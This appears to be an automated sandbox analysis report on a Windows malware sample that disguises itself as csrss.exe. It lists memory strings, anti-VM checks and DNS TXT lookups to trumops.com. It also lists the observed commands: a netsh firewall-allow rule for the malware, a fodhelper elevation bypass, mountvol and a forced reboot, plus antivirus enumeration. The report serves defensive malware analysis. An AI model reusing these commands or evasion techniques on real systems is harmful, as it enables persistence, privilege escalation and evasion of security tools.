Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: &gt;&lt;'\'') = ) m=+Inf+inf, n -Inf-inf.bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.sys.xml0.100x%x108020063125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCDN=CESTChamDATADashDateEESTEtagFromGOGCGoneHEADHKCCHKLMHostJulyJuneLisuMiaoModiNZDTNZSTNameNewaPINGPOSTQEMUROOTSASTStatThaiUUIDWESTXeon"%s"\rss\smb\u00\wup
Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: to unallocated span%%!%c(*big.Float=%s)%s\Sysnative\cmd.exe37252902984619140625Arabic Standard TimeAzores Standard TimeCertFindChainInStoreCertOpenSystemStoreWChangeServiceConfigWCheckTokenMembershipCreateProcessAsUserWCryptAcquireContextWDHT has wrong lengthDQT has wrong lengthDRI has wrong lengthEgyptian_HieroglyphsEnumProcessModulesExFileTimeToSystemTimeGetAcceptExSockaddrsGetAdaptersAddressesGetCurrentDirectoryWGetFileAttributesExWGetModuleFileNameExWGetModuleInformationGetProcessMemoryInfoGetWindowsDirectoryWIDS_Trinary_OperatorInsufficient StorageIsrael Standard TimeJordan Standard TimeMAX_HEADER_LIST_SIZEMalformed JSON errorMediapartners-GoogleMeroitic_HieroglyphsNtUnmapViewOfSectionNtWriteVirtualMemoryOffline Explorer/2.5ProcessIdToSessionIdQueryServiceConfig2WQueryServiceStatusExRegisterEventSourceWRequest URI Too LongRtlInitUnicodeStringSHGetKnownFolderPathSOF has wrong lengthSOS has wrong lengthSafeArrayDestroyDataSafeArrayGetElemsizeSeek: invalid offsetSeek: invalid whenceSetCurrentDirectoryWSetHandleInformationSetVolumeMountPointWTaipei Standard TimeTerminal_PunctuationTurkey Standard TimeUnprocessable EntityWinmonProcessMonitor[invalid char class]\\.\pipe\VBoxTrayIPCasn1: syntax error: bad defer size classbad font file formatbad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)close of nil channelconnection error: %sconnection timed outcouldn't disable DSEcouldn't get IsAdmincouldn't get serverscouldn't run servicecouldn't set IsAdmincouldn't set serverscouldn't stop PsaSvccouldn't write patchelectrum.hsmiths.comelectrum.taborsky.czelectrum.villocq.comflag: help requestedfloating point errorforcegc: phase errorgc_trigger underflowgetadaptersaddressesgo of nil func valuegopark: bad g statusgzip: invalid headerheader line too longhttp2: stream closedinvalid repeat countinvalid request codeis a named type filejson: Unmarshal(nil json: Unmarshal(nil)key has been revokedmSpanList.insertBackmalformed ciphertextmalloc during signalmultiple SOF markersno such struct fieldnon-empty swept listnorm: invalid whencenot an integer classnotetsleep not on g0number has no digitsnumber of componentsp mcache not flushedpacer: assist ratio=pad length too largepreempt off reason: reflect.Value.SetIntreflect.makeFuncStubrequest file CDN: %wroot\SecurityCenter2runtime: casgstatus runtime: double waitruntime: unknown pc semaRoot rotateRightshort segment lengthsystemdrive is emptytime: invalid numbertrace: out of memoryunexpected network: unknown address typeuser is not an adminverifier host cachedwirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not foundzlib: invalid header gp.gcscanvalid=true
Source: csrss.exe Binary or memory string: time: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (default %q) (default %v) MB released MB) wo
Source: 4t4y4r89UZ.exe, 00000000.00000002.293844995.0000000004C28000.00000040.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.320126645.0000000004BB5000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.553003907.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000010.00000002.364381433.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000017.00000002.393120243.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000022.00000002.387543295.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000032.00000002.400160271.0000000005200000.00000040.00000001.sdmp Binary or memory string: ameNewaPINGPOSTQEMUROOTHIT!u
Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: 100-continue152587890625762939453125Bidi_ControlCIDR addressCONTINUATIONCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCFindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot ModifiedNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTransitionalTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad Pq valuebad Ta valuebad Tc valuebad Td valuebad Th valuebad Tq valuebad flushGenbad g statusbad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegc
Source: 4t4y4r89UZ.exe, 00000000.00000002.293844995.0000000004C28000.00000040.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.320126645.0000000004BB5000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.553003907.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000010.00000002.364381433.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000017.00000002.393120243.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000022.00000002.387543295.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000032.00000002.400160271.0000000005200000.00000040.00000001.sdmp Binary or memory string: \\.\HGFS`
Source: svchost.exe, 00000002.00000002.546816375.00000286A1040000.00000004.00000001.sdmp, svchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmp, svchost.exe, 00000004.00000002.547367148.0000019AEA429000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: csrss.exe Binary or memory string: EndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTransitionalTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*
Source: csrss.exe Binary or memory string: ypeudp6uintunixuuidvaryvmciwavewildwindwoodxn-- -%s ... H_T= H_a= H_g= MB, W_a= and h_a= h_g= h_t= max= ptr siz= tab= top= u_a= u_g=%s %q%s*%d%s/%s%s:%d%s=%s%v-%v&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, ..., fp:-0930.html.jpeg.wasm.we
Source: csrss.exe Binary or memory string: llocStringLenToo Many RequestsTransfer-EncodingUnified_IdeographVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDNbad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327623272.00000000160D8000.00000004.00000001.sdmp Binary or memory string: vmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exespoolsv.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exe4t4y4r89uz.exevmsrvc.exevmusrvc.exevpc-s3vpcuhub$
Source: csrss.exe Binary or memory string: releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327631474.00000000160DE000.00000004.00000001.sdmp Binary or memory string: wtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exebackgroundTaskHost.exebackgroundtaskhost.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSgrmBroker.exemsvmmoufShellExperienceHost.exeshellexperiencehost.exeRuntimeBroker.exeruntimebroker.exesmartscreen.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSystemSettingsBroker.exesystemsettingsbroker.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exebackgroundTaskHost.exebackgroundtaskhost.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSgrmBroker.exeTrustedInstaller.exetrustedinstaller.exe4t4y4r89UZ.exexenevtchn`'
Source: csrss.exe Binary or memory string: mAtoiCDN=CESTChamDATADashDateEESTEtagFromGOGCGoneHEADHKCCHKLMHostJulyJuneLisuMiaoModiNZDTNZSTNameNewaPINGPOSTQEMUROOTSASTStatThaiUUIDWESTXeon"%s"\rss\smb\u00\wup %+v m=] n=agedarchasn1avx2basebindbirdbluebmi1bmi2boldboolbushcallcap cas1cas2cas3cas4cas5cas6cha
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wwildflowerws2_32.dll of size (targetpc= ErrCode=%v a.npages= b.npages= bytes ...
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: NonTransitionalNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePartial ContentProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
Source: csrss.exe, 00000032.00000002.400160271.0000000005200000.00000040.00000001.sdmp Binary or memory string: tvmhgfsQ
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: m=] n=agedarchasn1avx2basebindbirdbluebmi1bmi2boldboolbushcallcap cas1cas2cas3cas4cas5cas6chancoldcooldampdarkdatadatedawndeaddialdustermsetagfailfilefirefrogfromftpsfuncgziphazehillholyhosthourhttpicmpidleigmpint8jpegjsonkindlakelateleaflinklongmoonnonenullopenpathpinepipepondpop3quitrainreadsbrkseeksid=smtpsnowsse2sse3starsurftag:tcp4tcp6texttreetruetypeudp6uintunixuuidvaryvmciwavewildwindwoodxn-- -%s ...
Source: svchost.exe, 00000002.00000002.546609399.00000286A1002000.00000004.00000001.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmp Binary or memory string: vmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exedllhost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exeWmiPrvSE.exewmiprvse.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exeWmiPrvSE.exewmiprvse.exevmsrvc.exevmusrvc.exeWmiPrvSE.exewmiprvse.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exe@
Source: csrss.exe, 00000032.00000002.400160271.0000000005200000.00000040.00000001.sdmp Binary or memory string: yvmciwavewildwB
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327623272.00000000160D8000.00000004.00000001.sdmp Binary or memory string: svchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exexensvcxenvdb$
Source: csrss.exe, 00000022.00000002.388262330.0000000005700000.00000040.00000001.sdmp Binary or memory string: +x@Y}main.isRunningInsideVMWare
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327530754.00000000160B4000.00000004.00000001.sdmp Binary or memory string: vmsrvc.exesvchost.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesihost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exectfmon.exevmsrvc.exevmusrvc.exeexplorer.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exedllhost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exeSearchUI.exesearchui.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exeHxTsr.exehxtsr.exe$
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp Binary or memory string: DSA-SHA1DecemberDefenderDeleteDCDuployanEqualSidEthiopicExtenderFebruaryFirewallFullPathGeorgianGetOEMCPGoStringGujaratiGurmukhiHTTP/1.1HTTP/2.0HiraganaInstFailInstRuneJavaneseKatakanaKayah_LiLinear_ALinear_BLocationLsaCloseMahajaniNO_ERRORNO_PROXYNovemberOl_ChikiPRIORITYParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUgariticVBoxWddmVT_ARRAYVT_BYREFWSAIoctlWinmonFS[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnumacceptexaddress bad instcgocheckcs darknessdefault:delicatednsquerydurationeax ebp ebx ecx edi edx eflags eip embeddedesi esp exporterfinishedfragrantfs go1.13.3gs hijackedhttp/1.1https://if-matchif-rangeinfinityinjectorinvalid locationloopbackmac_addrmountainmountvolmsvmmoufnamelessno anodeno-cacheno_proxyopPseudopolishedraw-readreadfromrecvfromrestlessrunnableruntime.scavengeshutdownsolitarystrconv.taskkilltwilightunixgramunknown(usernamevmmemctlvmx_svgawitheredwsaioctlwuauservyuio.top (forced) blocked= defersc= in use)
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp Binary or memory string: sharedintapp.exe[system process]vmsrvc.exe
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327007315.000000001600E000.00000004.00000001.sdmp Binary or memory string: CoCreateInstanceConnectServerkernel32.dllGetUserDefaultLCIDoleaut32.dllExecQuerySysAllocStringLenShellExperienceHost.exeshellexperiencehost.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exevgauthservice.exefontdrvhost.exevgauthservice.exefontdrvhost.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exedwm.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exeMemory Compressionmemory compressionvgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevmmemctlvmusbmousevmx_svga\\.\HGFS\\.\vmci[System Process]SystemRegistrysmss.exefontdrvhost.exefontdrvhost.exedwm.exeMemory Compressionmemory compressionShellExperienceHost.exeshellexperiencehost.exeRuntimeBroker.exeruntimebroker.exesmartscreen.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSystemSettingsBroker.exesystemsettingsbroker.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exewtxhdpavigbpfmknxdutrtewwv.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exebackgroundTaskHost.exebackgroundtaskhost.exebackgroundTaskHost.exebackgroundtaskhost.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSgrmBroker.exeTrustedInstaller.exetrustedinstaller.exe4t4y4r89UZ.exe[System Process]SystemRegistrysmss.exefontdrvhost.exefontdrvhost.exedwm.exeMemory Compressionmemory compressionTrustedInstaller.exetrustedinstaller.exe4t4y4r89UZ.exe[System Process]SystemRegistrysmss.exefontdrvhost.exefontdrvhost.exedwm.exeMemory Compressionmemory compression

Anti Debugging:

barindex
Enables debug privileges
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\rss\csrss.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\rss\csrss.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

barindex
Performs DNS TXT record lookups
Source: Traffic DNS traffic detected: queries for: trumops.com
Source: Traffic DNS traffic detected: queries for: logs.trumops.com
Source: Traffic DNS traffic detected: queries for: f7873597-7b36-4441-9416-097456f134ae.uuid.trumops.com
Source: Traffic DNS traffic detected: queries for: e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes" Jump to behavior
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe /305-305 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5 Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe fodhelper Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe" Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\System32\fodhelper.exe Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: svchost.exe, 00000006.00000002.547446418.0000021170F90000.00000002.00020000.sdmp, csrss.exe, 0000000E.00000002.552647064.0000000003A60000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: svchost.exe, 00000006.00000002.547446418.0000021170F90000.00000002.00020000.sdmp, csrss.exe, 0000000E.00000002.552647064.0000000003A60000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: svchost.exe, 00000006.00000002.547446418.0000021170F90000.00000002.00020000.sdmp, csrss.exe, 0000000E.00000002.552647064.0000000003A60000.00000002.00020000.sdmp Binary or memory string: Progman
Source: svchost.exe, 00000006.00000002.547446418.0000021170F90000.00000002.00020000.sdmp, csrss.exe, 0000000E.00000002.552647064.0000000003A60000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval Jump to behavior
Modifies the windows firewall
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\4t4y4r89UZ.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
AV process strings found (often used to terminate AV products)
Source: svchost.exe, 00000008.00000002.547493168.000002364BB02000.00000004.00000001.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 00000008.00000002.546789573.000002364BA13000.00000004.00000001.sdmp Binary or memory string: \MsMpeng.exe

Remote Access Functionality:

barindex
Yara detected Metasploit Payload
Source: Yara match File source: 16.2.csrss.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 50.2.csrss.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.csrss.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.4t4y4r89UZ.exe.4fd0e50.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 42.2.csrss.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.csrss.exe.5700e50.11.raw.unpack, type: UNPACKEDPE
